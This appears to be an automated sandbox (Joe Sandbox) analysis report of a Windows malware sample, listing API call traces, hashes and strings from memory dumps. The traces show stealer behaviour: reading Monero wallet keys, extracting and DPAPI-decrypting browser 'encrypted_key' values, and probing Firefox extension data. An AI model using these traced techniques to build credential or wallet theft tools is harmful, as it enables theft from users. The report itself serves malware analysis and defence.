                                • Opcode Fuzzy Hash: c2f8e0a0e9068323b57844ee1236f2fa0826e3fda0a1ea4e6fbd2866c4c983f1
                                • Instruction Fuzzy Hash: 6401A975500108FFCB44DFE8C984EAE7BB9EB88355F108548F9199B304CA71AA40DB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009312B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009312BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009312D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009312F5
                                • RegCloseKey.ADVAPI32(?), ref: 009312FF
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 8aef21ada0ee6bef2d046a99f8350241ea5d1f4eeabdaaf6dcc820ba497a32b4
                                • Instruction ID: 3e7223f5cd3ca583ca51a5c2940504197db57c7e5ce8bfc2c69a6f51b6b4bdbc
                                • Opcode Fuzzy Hash: 8aef21ada0ee6bef2d046a99f8350241ea5d1f4eeabdaaf6dcc820ba497a32b4
                                • Instruction Fuzzy Hash: 0B0131B9A40208BBDB04DFE0DC49FAEB7BCEB88701F008159FA09972C0DA709A418F51
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Type
                                • String ID:
                                • API String ID: 2109742289-3916222277
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00946663
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00946726
                                • ExitProcess.KERNEL32 ref: 00946755
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00950E28,00000000,?), ref: 0094882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00948836
                                • wsprintfA.USER32 ref: 00948850
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0094951E,00000000), ref: 00948D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00948D62
                                • wsprintfW.USER32 ref: 00948D78
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,015BA2A0,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093A2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 0093A3FF
                                • lstrlen.KERNEL32(00000000), ref: 0093A6BC
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 0093A743
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,015BA2A0,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093D481
                                • lstrlen.KERNEL32(00000000), ref: 0093D698
                                • lstrlen.KERNEL32(00000000), ref: 0093D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 0093D72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,015BA2A0,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093D801
                                • lstrlen.KERNEL32(00000000), ref: 0093D99F
                                • lstrlen.KERNEL32(00000000), ref: 0093D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 0093DA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                  • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                  • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                  • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                  • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                  • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                  • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00951580,00950D92), ref: 0093F54C
                                • lstrlen.KERNEL32(00000000), ref: 0093F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                  • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                  • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                  • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                  • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                  • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                  • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00939D39
                                  • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939AEF
                                  • Part of subcall function 00939AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00934EEE,00000000,?), ref: 00939B01
                                  • Part of subcall function 00939AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00934EEE,00000000,00000000), ref: 00939B2A
                                  • Part of subcall function 00939AC0: LocalFree.KERNEL32(?,?,?,?,00934EEE,00000000,?), ref: 00939B3F
                                  • Part of subcall function 00939B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00939B84
                                  • Part of subcall function 00939B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00939BA3
                                  • Part of subcall function 00939B60: LocalFree.KERNEL32(?), ref: 00939BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                APIs
                                • CreateFileA.KERNEL32(00943AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00943AEE,?), ref: 009492FC
                                • GetFileSizeEx.KERNEL32(000000FF,00943AEE), ref: 00949319
                                • CloseHandle.KERNEL32(000000FF), ref: 00949327
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                APIs
                                • __getptd.LIBCMT ref: 0094C74E
                                  • Part of subcall function 0094BF9F: __amsg_exit.LIBCMT ref: 0094BFAF
                                • __getptd.LIBCMT ref: 0094C765
                                • __amsg_exit.LIBCMT ref: 0094C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0094C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                APIs
                                  • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00944F7A
                                • lstrcat.KERNEL32(?,00951070), ref: 00944F97
                                • lstrcat.KERNEL32(?,015B91C8), ref: 00944FAB
                                • lstrcat.KERNEL32(?,00951074), ref: 00944FBD
                                  • Part of subcall function 00944910: wsprintfA.USER32 ref: 0094492C
                                  • Part of subcall function 00944910: FindFirstFileA.KERNEL32(?,?), ref: 00944943
                                  • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FDC), ref: 00944971
                                  • Part of subcall function 00944910: StrCmpCA.SHLWAPI(?,00950FE0), ref: 00944987
                                  • Part of subcall function 00944910: FindNextFileA.KERNEL32(000000FF,?), ref: 00944B7D
                                  • Part of subcall function 00944910: FindClose.KERNEL32(000000FF), ref: 00944B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0